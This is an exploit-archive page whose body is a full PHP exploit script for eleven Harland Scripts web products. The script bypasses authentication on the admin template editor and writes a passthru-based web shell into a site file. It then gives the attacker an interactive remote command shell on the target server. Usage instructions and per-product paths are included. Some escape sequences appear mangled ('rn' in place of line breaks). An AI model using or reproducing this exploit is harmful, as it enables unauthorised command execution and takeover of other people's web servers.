[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Harland Scripts 11 Products Remote Command Execution Exploit
# Published : 2009-05-15
# Author : G4N0K
# Previous Title : Joomla Component ArtForms 2.1 b7 Remote File Inclusion Vulnerabilities
# Next Title : Rama CMS <= 0.9.8 (download.php file) File Disclosure Vulnerability


<?php
//786
/*
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...FROM IRAN

==============================================================================
	Harland Scripts 11 Products Remote Command Execution Exploit
==============================================================================

	[?a] Script:.............[ Harland Scripts 11 Products ]...............
	[?a] Website:............[ http://harlandscripts.com(!) ]..............
	[?a] Today:..............[ 1005009  ]..................................
	[?a] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......




	 [+] What's going on
	======================================
       [0] Auth bypass...
       [1] PHP-Code Injection...


	 [+] Vulnerable Scripts
	======================================
       1 - Traffic Click 4 Cash Script
       2 - Get A Date Script
       3 - Birthsake Keepsake
       4 - FFA
       5 - TShirt Rental Script
       6 - Mug Rental script
       7 - Top Hits
       8 - Recipe 6.0
       9 - Link Lister Traffic System
      10 - Link Back Checker Service Script
      11 - AD PHP Script


	 [+] SQLi & AFU
	======================================
	 Some of these scripts are also vulnerable to "SQLi" and "Arbitrary File Upload(Auth bypass)"...


*/
error_reporting(0);

if (php_sapi_name() <> "cli") {
	die("WTF, Run Me From CommandLine...");
}
if ($argc <> 4){__nfo();__usg();exit;}
$hst = $argv[1];
$pth = $argv[2];
$prd = $argv[3];

function __nfo()
{
$ganok = <<<EOL
	
        +-------------------------------------------------------------+
        | Harland Scripts Multiple Products Command Execution Exploit |
        |              by: G4N0K | mail[o]ganok[ta]com                |
        |          Thanks: ALLAH, MSD, SMN, AMD, AFN, Str0ke          |
        +-------------------------------------------------------------+
rn
EOL;
print $ganok;
}

function __usg()
{
echo <<<GNK
        uasge...:
	
		  xpl.php [host] [path] [product-number]
		  xpl.php 127.0.0.1 /FFA/ 4
		
		  
          Product Numbers:
          =========================================
          1 - Traffic Click 4 Cash Script
          2 - Get A Date Script
          3 - Birthsake Keepsake
          4 - FFA
          5 - TShirt Rental Script
          6 - Mug Rental script
          7 - Top Hits
          8 - Recipe 6.0
          9 - Link Lister Traffic System
         10 - Link Back Checker Service Script
         11 - AD PHP Script
		 
GNK;
}

function __snd($hst, $pkt)
{
	$socket = fsockopen($hst, 80, $errno, $errstr, 30);
	$ggg='';
	if (!$socket) {
		echo "rn    [+] Socket err#: $errstr ($errno)nr";exit;
	} else {
		fwrite($socket, $pkt);
		while (!feof($socket)) {
			$g4n0k.=fgets($socket, 2048);
		}
		fclose($socket);
		return $g4n0k;
	}
}

function __srch($wt)
{
	$pos = strpos($wt, 'gnkgnkgnk');
	$pos_end = strrpos($wt, 'gnkgnkgnk');
	if (!$pos && !$pos_end){echo " [!] error...rn";}
	$rest = substr($wt, $pos+9, ($pos_end - ($pos+9)));
	return $rest;
}

	$joke = "act=save&fname=..%2Ftpl%2Fheader.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
	
	__nfo();

		if ($prd == 1 || $prd == 2 || $prd == 3 || $prd == 4)
		{
			$pth0 = "admin/template.php";
			$pth1 = "tpl/header.php";
		}
		  elseif ($prd == 5 || $prd == 6)
		{
			$pth0 = "admin/template.php";
			$pth1 = "templates/header.php";
		}
		  elseif ($prd == 7)
		{
			$pth0 = "admin/template.php";
			$pth1 = "template/header.php";
			
		} elseif ($prd == 8)
		{
			$pth0 = "admin2/template.php";
			$pth1 = "admin2/gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 9)
		{
			$pth0 = "admin/template.php";
			$pth1 = "admin/backup/gnk.php";
			$joke = "act=save&fname=backup%2Fgnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 10)
		{
			$pth0 = "admincontrol/template.php";
			$pth1 = "admincontrol/gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} elseif ($prd == 11)
		{
			$pth0 = "template.php";
			$pth1 = "gnk.php";
			$joke = "act=save&fname=gnk.php&art=%3C%3Fphp+error_reporting%280%29%3Bprint%28%22gnkgnkgnk%22%29%3Bpassthru%28%24_GET%5B%22gnk%22%5D%29%3Bprint%28%22gnkgnkgnk%22%29%3B+%3F%3E";
			
		} else 
		{
			__usg();
			exit;
		}

	$msd_pyld  = "POST {$pth}{$pth0} HTTP/1.1rn";
	$msd_pyld .= "Host: {$hst}rn";
	$msd_pyld .= "Keep-Alive: 300nr";
	$msd_pyld .= "Connection: keep-alivern";
	$msd_pyld .= "Content-Length: ".strlen($joke)."rn";
	$msd_pyld .= "Content-Type: application/x-www-form-urlencodedrnrn";
	$msd_pyld .= $joke;


	echo "rn  [+] Trying to exploit {$hst}...";

	$amd_pyld  = "GET {$pth}{$pth1} HTTP/1.1rn";
	$amd_pyld .= "Host: {$hst}rn";
	$amd_pyld .= "Connection: closenrnr";

	if (!stristr(__snd($hst, $msd_pyld), "permission") && stristr(__snd($hst, $amd_pyld), "gnk"))
	{
		echo "rn  [+] PHP-Code has been injected...";
		echo "rn  [+] Now you can exec your commands...rn";} else {
		echo "rn  [+] Oops!, Code injection failed.rn"; exit;
	}

while(1)
{
	echo "rnphp-shell@{$hst}# ";
	if (($cmd = str_replace (" ", "%20", trim(fgets(STDIN)))) == "exit") exit;
	$smn_pyld  = "GET {$pth}{$pth1}?gnk=".$cmd." HTTP/1.1rn";
	$smn_pyld .= "Host: {$hst}rn";
	$smn_pyld .= "Connection: closenrnr";
	print __srch(__snd($hst, $smn_pyld));
}

?>

# www.Syue.com [2009-05-15]